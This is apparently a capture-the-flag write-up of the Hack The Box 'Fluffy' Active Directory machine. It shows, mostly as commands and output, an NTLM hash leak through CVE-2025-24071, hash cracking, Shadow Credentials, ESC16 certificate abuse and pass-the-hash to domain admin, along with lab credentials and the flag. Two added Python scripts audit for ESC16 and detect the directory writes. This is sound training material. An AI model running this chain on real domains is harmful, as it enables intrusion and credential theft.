Table of Contents
Reconnaissance
Run a scan with nmap.
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-03-22 21:45:08Z)
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-22T21:46:45+00:00; +13m11s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after:  2026-04-17T16:04:17
| MD5:     2765 a68f 4883 dc6d 0969 5d0d 3666 c880
| SHA-1:   72f3 1d5f e6f3 b8ab 6b0e dd77 5414 0d0c abfe e681
| SHA-256: 20ab 7b99 256b 4385 9fac 457a 1890 37bf 37e2 5f11 5a62 e97c e072 e586 e83e 9dca
|_(PEM certificate body omitted)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-22T21:46:45+00:00; +13m11s from scanner time.
|_ssl-cert: same certificate as on port 389 (DC01.fluffy.htb, issued by fluffy-DC01-CA)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-22T21:46:45+00:00; +13m11s from scanner time.
|_ssl-cert: same certificate as on port 389 (DC01.fluffy.htb, issued by fluffy-DC01-CA)
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-22T21:46:45+00:00; +13m11s from scanner time.
|_ssl-cert: same certificate as on port 389 (DC01.fluffy.htb, issued by fluffy-DC01-CA)
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49693/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49694/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49703/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49713/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49726/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49760/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Access SMB with the credentials provided for the box.
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ smbclient //10.129.10.103/IT -U "j.fleischman%J0elTHEM4n1990\!"
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon May 19 23:27:02 2025
.. D 0 Mon May 19 23:27:02 2025
Everything-1.4.1.1026.x64 D 0 Sat Apr 19 00:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Sat Apr 19 00:04:05 2025
KeePass-2.58 D 0 Sat Apr 19 00:08:38 2025
KeePass-2.58.zip A 3225346 Sat Apr 19 00:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 23:31:07 2025
5842943 blocks of size 4096. 1857948 blocks available
smb: \> get Everything-1.4.1.1026.x64.zip
getting file \Everything-1.4.1.1026.x64.zip of size 1827464 as Everything-1.4.1.1026.x64.zip (670.7 KiloBytes/sec) (average 670.7 KiloBytes/sec)
smb: \> get KeePass-2.58.zip
getting file \KeePass-2.58.zip of size 3225346 as KeePass-2.58.zip (174.6 KiloBytes/sec) (average 238.4 KiloBytes/sec)
smb: \> get Upgrade_Notice.pdf
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (156.0 KiloBytes/sec) (average 234.3 KiloBytes/sec)
smb: \>
Upgrade_Notice.pdf contains information about vulnerabilities.
CVE-2025-24071, listed in the PDF, concerns NTLM hash leakage.
Run the PoC referenced above.
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
Cloning into 'CVE-2025-24071_PoC'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 18 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 6.30 KiB | 6.30 MiB/s, done.
Resolving deltas: 100% (4/4), done.

┌──(kali㉿kali)-[~/htb/fluffy]
└─$ cd CVE-2025-24071_PoC

┌──(kali㉿kali)-[~/htb/fluffy/CVE-2025-24071_PoC]
└─$ ls
README.md  poc.py

┌──(kali㉿kali)-[~/htb/fluffy/CVE-2025-24071_PoC]
└─$ python3 poc.py
Enter your file name: exploit
Enter IP (EX: 192.168.1.162): 10.10.14.179
completed

┌──(kali㉿kali)-[~/htb/fluffy/CVE-2025-24071_PoC]
└─$ smbclient //10.129.232.88/IT -U "j.fleischman%J0elTHEM4n1990\!"
Try "help" to get a list of possible commands.
smb: \> put exploit
exploit does not exist
smb: \> put ./exploit.zip
putting file ./exploit.zip as \exploit.zip (0.6 kB/s) (average 0.6 kB/s)
smb: \>
The NTLMv2 hash is captured on the Responder side.
[SMB] NTLMv2-SSP Client   : 10.129.232.88
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:da80d6146d797b5b
Crack the captured hash.
Hash identification
~$ hashcat agila.hash ./rockyou.txt
hashcat (v6.2.5) starting in autodetect mode

OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-AMD Ryzen 3 3100 4-Core Processor, 2898/5860 MB (1024 MB allocatable), 8MCU

The following 2 hash-modes match the structure of your input hash:

      # | Name                                                | Category
  ======+=====================================================+======================================
   5600 | NetNTLMv2                                           | Network Protocol
  27100 | NetNTLMv2 (NT)                                      | Network Protocol

Please specify the hash-mode with -m [hash-mode].
Hash cracking
~$ hashcat -m 5600 -a 0 agila.hash ./rockyou.txt
P.AGILA::FLUFFY:da80d6146d797b5b:ae4434e2f7d9d237bcc2f8fc624ef2c7:010100000000000000d2269cffbedc012aa49d22a27422610000000002000800550036003500300001001e00570049004e002d00530059004400530056004a0043004c0041003200520004003400570049004e002d00530059004400530056004a0043004c004100320052002e0055003600350030002e004c004f00430041004c000300140055003600350030002e004c004f00430041004c000500140055003600350030002e004c004f00430041004c000700080000d2269cffbedc01060004000200000008003000300000000000000001000000002000001cd51f0dae3a6e1175e4dba205e533128f1223f5db4ab6392cb78a9effec31580a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100370039000000000000000000:prometheusx-303
Run BloodHound with the credentials obtained.
p.agila has GenericAll over the Service Accounts group.

The rights held by Service Accounts are as follows.
Service Accounts has GenericWrite over winrm_svc, and the BloodHound help text for that edge describes Shadow Credentials.

Add p.agila to Service Accounts.
Then list the group members to confirm that the addition actually took effect.
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ bloodyAD --host '10.129.12.232' -d 'dc01.fluffy.htb' -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' p.agila
[+] p.agila added to SERVICE ACCOUNTS
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ bloodyAD --host 10.129.12.232 -d 'dc01.fluffy.htb' \
-u 'p.agila' -p 'prometheusx-303' \
get search --filter "(cn=Service Accounts)"
distinguishedName: CN=Service Accounts,CN=Users,DC=fluffy,DC=htb
cn: Service Accounts
dSCorePropagationData: 2025-04-19 12:38:12+00:00
groupType: -2147483646
instanceType: 4
member: CN=winrm service,CN=Users,DC=fluffy,DC=htb; CN=Prometheus Agila,CN=Users,DC=fluffy,DC=htb; CN=ldap service,CN=Users,DC=fluffy,DC=htb; CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
Also synchronize your clock with the DC before the attack; see the article linked below for how to do the time sync.
Once p.agila is a member of Service Accounts, perform the Shadow Credentials attack.
Note: if certipy fails with an error like "No Route ...", specifying -dc-host may resolve it.
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad shadow auto \
-u 'p.agila@fluffy.htb' \
-p 'prometheusx-303' \
-dc-ip 10.129.12.232 \
-dc-host dc01.fluffy.htb \
-account 'WINRM_SVC'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3ff6fabc967841268c6c0dc7b5ad8ac7'
[*] Adding Key Credential with device ID '3ff6fabc967841268c6c0dc7b5ad8ac7' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '3ff6fabc967841268c6c0dc7b5ad8ac7' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
┌──(kali㉿kali)-[~/htb/fluffy]
└─$
Obtaining user.txt
You can log in with the NT hash obtained above.
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ evil-winrm -i 10.129.12.232 -u winrm_svc -H '33bd09dcd697600edf6b3a7af4875767'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
Privilege Escalation
Perform the Shadow Credentials attack against CA_SVC as well.
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad shadow auto \
-u 'p.agila@fluffy.htb' \
-p 'prometheusx-303' \
-dc-ip 10.129.12.232 \
-dc-host dc01.fluffy.htb \
-account 'CA_SVC'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'cdb2d666dca940f5ac40de2664221bcc'
[*] Adding Key Credential with device ID 'cdb2d666dca940f5ac40de2664221bcc' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'cdb2d666dca940f5ac40de2664221bcc' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
┌──(kali㉿kali)-[~/htb/fluffy]
└─$
Using the credentials obtained, look for vulnerable certificate templates.
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad find -vulnerable -u CA_SVC -hashes ":ca0f4f9e9eb8a092addf53bb03fc98c8" -dc-ip 10.129.12.232
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260330061728_Certipy.txt'
[*] Wrote text output to '20260330061728_Certipy.txt'
[*] Saving JSON output to '20260330061728_Certipy.json'
[*] Wrote JSON output to '20260330061728_Certipy.json'
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ cat 20260330061728_Certipy.txt
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
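The report above states the ESC16 precondition in one field: the CA has the object SID extension (OID 1.3.6.1.4.1.311.25.2, szOID_NTDS_CA_SECURITY_EXT) in its Disabled Extensions, so every certificate it issues lacks the SID binding and the DC can only map it by name. As an added audit example (not Certipy's own code), the script below parses a report in the Certipy.txt layout shown above and flags CAs in that state; the sample report is constructed from the fields on this page.

```python
import re

# OID of szOID_NTDS_CA_SECURITY_EXT, the certificate extension that binds a
# certificate to the requester's object SID.
SID_EXTENSION_OID = "1.3.6.1.4.1.311.25.2"

# Constructed report in the layout of the Certipy.txt output shown above.
SAMPLE_REPORT = """\
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\\Domain Admins
                                          FLUFFY.HTB\\Enterprise Admins
        Enroll                          : FLUFFY.HTB\\Cert Publishers
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
Certificate Templates                   : [!] Could not find any certificate templates
"""

OID_RE = re.compile(r"(\d+\.)+\d+")


def parse_ca_section(report):
    """Return one dict per CA from the 'Certificate Authorities' part of a
    certipy text report. Every field maps to a list of strings so that
    single values and multi-line lists (Access Rights) are handled alike."""
    cas, current, last_key, in_section = [], None, None, False
    for raw in report.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "Certificate Authorities":
            in_section = True
            continue
        if line.startswith("Certificate Templates"):
            break                               # end of the CA section
        if not in_section:
            continue
        if line.isdigit():                      # "0", "1", ...: a new CA record
            current, last_key = {}, None
            cas.append(current)
            continue
        if current is None:
            continue
        if ":" in line:
            key, _, value = line.partition(":")  # split on the first colon only
            key, value = key.strip(), value.strip()
            current[key] = [value] if value else []
            last_key = key
        elif last_key and ("\\" in line or OID_RE.fullmatch(line)):
            current[last_key].append(line)      # continuation: DOMAIN\Principal or another OID
        else:
            last_key = None                     # sub-headers such as "Permissions"
    return cas


def assess_esc16(cas):
    """Flag every CA whose Disabled Extensions contain the SID extension OID and
    report who can enroll, since any such enrollee gets SID-less certificates."""
    findings = []
    for ca in cas:
        if SID_EXTENSION_OID in ca.get("Disabled Extensions", []):
            findings.append({
                "ca": ca["CA Name"][0],
                "dns": ca.get("DNS Name", [""])[0],
                "enroll": ca.get("Enroll", []),
                "san_user_specified": ca.get("User Specified SAN", ["unknown"])[0],
            })
    return findings


if __name__ == "__main__":
    for f in assess_esc16(parse_ca_section(SAMPLE_REPORT)):
        print(f"[ESC16] {f['ca']} ({f['dns']}): SID extension disabled; "
              f"enroll rights: {', '.join(f['enroll'])}")
```

The fix on the CA side is to remove the OID from the policy module's DisableExtensionList so issued certificates carry the SID again, then confirm by re-running the report and this check.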
We proceed as follows.
Because the step that matters is rewriting the UPN, the flow is close to ESC1.
- As p.agila, use Shadow Credentials to add a temporary certificate-based logon method to ca_svc.
- Use that certificate to obtain a TGT and the NT hash as ca_svc.
- Using the ca_svc TGT, have AD CS issue a certificate whose UPN is administrator.
- Authenticate with administrator.pfx via PKINIT and obtain the domain administrator's NT hash.
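Both the Shadow Credentials step (a write to msDS-KeyCredentialLink on someone else's account, as in the winrm_svc and ca_svc steps above) and the ESC16 step (ca_svc's userPrincipalName temporarily set to administrator, then restored) are directory writes that a domain controller logs as Security event 5136 when Directory Service Changes auditing is on. The detection logic below is an added example, not part of the original write-up; it runs over constructed 5136-style records whose DNs follow the group listing above, while the timestamps, the Joel Fleischman and Administrator DNs and the DN-to-sAMAccountName table are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed lookup from object DN to sAMAccountName (in practice resolve
# through LDAP or a BloodHound export).
DN_TO_SAM = {
    "CN=winrm service,CN=Users,DC=fluffy,DC=htb": "winrm_svc",
    "CN=certificate authority service,CN=Users,DC=fluffy,DC=htb": "ca_svc",
    "CN=Joel Fleischman,CN=Users,DC=fluffy,DC=htb": "j.fleischman",
    "CN=Administrator,CN=Users,DC=fluffy,DC=htb": "administrator",
}

# Constructed Security event 5136 records (directory object modified), reduced
# to the fields the rules need. The key credential blobs are abbreviated.
EVENTS = [
    {"time": "2026-03-30T06:05:10", "subject": "FLUFFY\\p.agila",
     "object": "CN=winrm service,CN=Users,DC=fluffy,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "operation": "ValueAdded", "value": "B:828:..."},
    {"time": "2026-03-30T06:05:41", "subject": "FLUFFY\\p.agila",
     "object": "CN=winrm service,CN=Users,DC=fluffy,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "operation": "ValueDeleted", "value": "B:828:..."},
    # a user enrolling a key credential on their own account: benign, not flagged
    {"time": "2026-03-30T06:10:00", "subject": "FLUFFY\\j.fleischman",
     "object": "CN=Joel Fleischman,CN=Users,DC=fluffy,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "operation": "ValueAdded", "value": "B:828:..."},
    {"time": "2026-03-30T06:20:03", "subject": "FLUFFY\\p.agila",
     "object": "CN=certificate authority service,CN=Users,DC=fluffy,DC=htb",
     "attribute": "userPrincipalName", "operation": "ValueAdded", "value": "administrator"},
    {"time": "2026-03-30T06:22:30", "subject": "FLUFFY\\p.agila",
     "object": "CN=certificate authority service,CN=Users,DC=fluffy,DC=htb",
     "attribute": "userPrincipalName", "operation": "ValueAdded", "value": "ca_svc@fluffy.htb"},
]

WINDOW = timedelta(hours=1)  # how soon a follow-up write counts as "set and restored"


def _sam(principal):
    """'FLUFFY\\p.agila' -> 'p.agila'."""
    return principal.rsplit("\\", 1)[-1].lower()


def _when(event):
    return datetime.fromisoformat(event["time"])


def detect(events, dn_to_sam=DN_TO_SAM, window=WINDOW):
    """Apply two rules and return a list of alert dicts.
    shadow-credential: msDS-KeyCredentialLink written by a principal other than
      the account itself (the edge BloodHound labels Shadow Credentials).
    upn-collision: userPrincipalName set to the name of a different known account
      (the temporary 'administrator' UPN in the ESC16 step).
    Each alert also records whether the write was undone inside the window,
    because both steps above end with a restore of the original value."""
    by_key = defaultdict(list)
    for ev in sorted(events, key=_when):
        by_key[(ev["object"], ev["attribute"])].append(ev)
    known = set(dn_to_sam.values())
    alerts = []
    for (dn, attr), evs in by_key.items():
        target = dn_to_sam.get(dn, dn).lower()
        for i, ev in enumerate(evs):
            if ev["operation"] != "ValueAdded":
                continue
            later = [e for e in evs[i + 1:] if _when(e) - _when(ev) <= window]
            actor = _sam(ev["subject"])
            if attr == "msDS-KeyCredentialLink" and actor != target:
                alerts.append({"rule": "shadow-credential", "object": target, "subject": actor,
                               "time": ev["time"],
                               "short_lived": any(e["operation"] == "ValueDeleted" for e in later)})
            elif attr == "userPrincipalName":
                name = ev["value"].split("@", 1)[0].lower()
                if name != target and name in known:
                    alerts.append({"rule": "upn-collision", "object": target, "subject": actor,
                                   "time": ev["time"], "impersonates": name,
                                   "reverted": any(e["operation"] == "ValueAdded" and
                                                   e["value"].split("@", 1)[0].lower() == target
                                                   for e in later)})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```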
Obtain a TGT and the NT hash as ca_svc.
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.129.232.88' -dc-host 'dc01.fluffy.htb' -account 'ca_svc' auto
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '7360fd2e00354660bee994d09adc7a7c'
[*] Adding Key Credential with device ID '7360fd2e00354660bee994d09adc7a7c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '7360fd2e00354660bee994d09adc7a7c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
File 'ca_svc.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename):
[*] Wrote credential cache to 'ca_svc_094a68e5-e53b-4e7f-a4ca-13744e990800.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
Temporarily change the UPN of the ca_svc user to administrator.
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.129.232.88' -dc-host 'dc01.fluffy.htb' -upn 'administrator' -user 'ca_svc' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
Point the KRB5CCNAME environment variable at the TGT obtained above.
Then run the following command to request a certificate from AD CS.
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ export KRB5CCNAME=ca_svc.ccache
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad req -k -dc-ip '10.129.232.88' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User' -debug
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[+] Domain retrieved from CCache: FLUFFY.HTB
[+] Username retrieved from CCache: ca_svc
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[+] DC host (-dc-host) not specified. Using domain as DC host
[+] Nameserver: '10.129.232.88'
[+] DC IP: '10.129.232.88'
[+] DC Host: 'FLUFFY.HTB'
[+] Target IP: None
[+] Remote Name: 'DC01.FLUFFY.HTB'
[+] Domain: 'FLUFFY.HTB'
[+] Username: 'CA_SVC'
[+] Trying to resolve 'DC01.FLUFFY.HTB' at '10.129.232.88'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Checking for Kerberos ticket cache
[+] Loaded Kerberos cache from ca_svc.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache credential: ca_svc
[+] Getting TGS for 'HOST/DC01.FLUFFY.HTB'
[+] Got TGS for 'HOST/DC01.FLUFFY.HTB'
[+] Trying to connect to endpoint: ncacn_np:10.129.232.88[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.232.88[\pipe\cert]
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Restore the UPN of the ca_svc user, then authenticate as administrator.
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.129.232.88' -dc-host 'dc01.fluffy.htb' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ certipy-ad auth -dc-ip '10.129.232.88' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
With the NT hash obtained, you can access the host as Administrator.
┌──(kali㉿kali)-[~/htb/fluffy]
└─$ evil-winrm -i 10.129.232.88 -u 'administrator' -H 8da83a3fa618b6e3a00e93f676c92a6e
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
fluffy\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
7a742c0db8fba4a8ce16d6881008565e
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami